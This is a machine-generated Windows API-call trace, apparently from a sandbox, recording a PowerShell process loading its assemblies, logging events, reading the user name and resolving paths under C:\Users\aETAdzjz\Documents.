	[0212.991] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4ce58*="Function", lpRawData=0x2f4cbe8) returned 1
	[0213.084] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0213.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.084] CoTaskMemFree (pv=0x3f5ba0) 
	[0218.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.397] CoTaskMemAlloc (cb=0x804) returned 0x1b980ae0
	[0218.397] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b980ae0, nSize=0x25d288 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x25d288) returned 0x1
	[0218.397] CoTaskMemFree (pv=0x1b980ae0) 
	[0218.397] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0218.397] GetUserNameW (in: lpBuffer=0x4331c0, pcbBuffer=0x25d2c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x25d2c8) returned 1
	[0218.398] CoTaskMemFree (pv=0x4331c0) 
	[0218.398] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f7f098*="Registry", lpRawData=0x2f7ee28) returned 1
	[0218.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0218.829] CoTaskMemAlloc (cb=0x804) returned 0x1b980ae0
	[0218.829] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b980ae0, nSize=0x25d288 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x25d288) returned 0x1
	[0218.829] CoTaskMemFree (pv=0x1b980ae0) 
	[0218.829] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0218.829] GetUserNameW (in: lpBuffer=0x4331c0, pcbBuffer=0x25d2c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x25d2c8) returned 1
	[0218.829] CoTaskMemFree (pv=0x4331c0) 
	[0218.829] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f84460*="Variable", lpRawData=0x2f841f0) returned 1
	[0218.965] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0218.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.965] CoTaskMemFree (pv=0x3f5ba0) 
	[0218.967] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0218.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0218.967] CoTaskMemFree (pv=0x3f5ba0) 
	[0218.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0218.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0218.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0218.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0221.015] CoTaskMemAlloc (cb=0x804) returned 0x1b980ae0
	[0221.015] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b980ae0, nSize=0x25d288 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x25d288) returned 0x1
	[0221.016] CoTaskMemFree (pv=0x1b980ae0) 
	[0221.016] CoTaskMemAlloc (cb=0x204) returned 0x4331c0
	[0221.016] GetUserNameW (in: lpBuffer=0x4331c0, pcbBuffer=0x25d2c8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x25d2c8) returned 1
	[0221.016] CoTaskMemFree (pv=0x4331c0) 
	[0221.016] ReportEventW (hEventLog=0x1ba50008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f98028*="Certificate", lpRawData=0x2f97db8) returned 1
	[0221.605] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0221.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.605] CoTaskMemFree (pv=0x3f5ba0) 
	[0221.609] GetLogicalDrives () returned 0x4
	[0221.609] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25cf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0221.609] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0221.610] CoTaskMemAlloc (cb=0x20e) returned 0x1b962560
	[0221.610] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b962560 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0221.610] CoTaskMemFree (pv=0x1b962560) 
	[0221.611] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0221.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.611] CoTaskMemFree (pv=0x3f5ba0) 
	[0221.611] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0221.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.611] CoTaskMemFree (pv=0x3f5ba0) 
	[0221.632] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0221.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.638] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0221.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0221.641] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0221.642] SetErrorMode (uMode=0x1) returned 0x1
	[0221.642] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x25ced0 | out: lpFileInformation=0x25ced0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0221.642] SetErrorMode (uMode=0x1) returned 0x1
	[0221.642] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0221.642] SetErrorMode (uMode=0x1) returned 0x1
	[0221.642] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x25ced0 | out: lpFileInformation=0x25ced0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0221.642] SetErrorMode (uMode=0x1) returned 0x1
	[0221.644] CoTaskMemAlloc (cb=0x104) returned 0x3f5ba0
	[0221.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3f5ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0222.252] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.255] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.255] SetErrorMode (uMode=0x1) returned 0x1
	[0222.255] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25ce90 | out: lpFileInformation=0x25ce90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.255] SetErrorMode (uMode=0x1) returned 0x1
	[0222.255] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25cc80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.255] SetErrorMode (uMode=0x1) returned 0x1
	[0222.255] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x25ce90 | out: lpFileInformation=0x25ce90*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.255] SetErrorMode (uMode=0x1) returned 0x1
	[0222.256] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25cc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.256] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25cb80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0222.256] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.256] SetErrorMode (uMode=0x1) returned 0x1
	[0222.256] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25ce90 | out: lpFileInformation=0x25ce90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.256] SetErrorMode (uMode=0x1) returned 0x1
	[0222.256] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.256] SetErrorMode (uMode=0x1) returned 0x1
	[0222.256] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25ce90 | out: lpFileInformation=0x25ce90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.256] SetErrorMode (uMode=0x1) returned 0x1
	[0222.256] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.256] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x25cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.257] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x25cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.257] SetErrorMode (uMode=0x1) returned 0x1
	[0222.257] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x25ce90 | out: lpFileInformation=0x25ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.257] SetErrorMode (uMode=0x1) returned 0x1
	[0222.257] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x25cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.257] SetErrorMode (uMode=0x1) returned 0x1
	[0222.257] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x25ce90 | out: lpFileInformation=0x25ce90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.257] SetErrorMode (uMode=0x1) returned 0x1
	[0222.257] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x25cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.257] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x25cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.257] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.257] SetErrorMode (uMode=0x1) returned 0x1
	[0222.258] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x25ce90 | out: lpFileInformation=0x25ce90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.258] SetErrorMode (uMode=0x1) returned 0x1
	[0222.258] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25cc80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.258] SetErrorMode (uMode=0x1) returned 0x1
	[0222.258] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x25ce90 | out: lpFileInformation=0x25ce90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.258] SetErrorMode (uMode=0x1) returned 0x1
	[0222.258] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.258] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x25cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.258] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.258] SetErrorMode (uMode=0x1) returned 0x1
	[0222.258] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25ced0 | out: lpFileInformation=0x25ced0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.259] SetErrorMode (uMode=0x1) returned 0x1
	[0222.259] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.259] SetErrorMode (uMode=0x1) returned 0x1
	[0222.259] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x25ced0 | out: lpFileInformation=0x25ced0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0222.259] SetErrorMode (uMode=0x1) returned 0x1
	[0222.259] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x25ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.259] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x25cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0222.259] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x25ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.259] SetErrorMode (uMode=0x1) returned 0x1
	[0222.259] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x25ced0 | out: lpFileInformation=0x25ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.259] SetErrorMode (uMode=0x1) returned 0x1
	[0222.259] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x25ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.259] SetErrorMode (uMode=0x1) returned 0x1
	[0222.260] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x25ced0 | out: lpFileInformation=0x25ced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.260] SetErrorMode (uMode=0x1) returned 0x1
	[0222.260] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x25ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.260] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x25cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0222.260] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.260] SetErrorMode (uMode=0x1) returned 0x1
	[0222.260] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x25ced0 | out: lpFileInformation=0x25ced0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.260] SetErrorMode (uMode=0x1) returned 0x1
	[0222.260] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.260] SetErrorMode (uMode=0x1) returned 0x1
	[0222.260] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x25ced0 | out: lpFileInformation=0x25ced0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0222.260] SetErrorMode (uMode=0x1) returned 0x1
	[0222.260] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x25ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0222.261] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\.", nBufferLength=0x105, lpBuffer=0x25cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
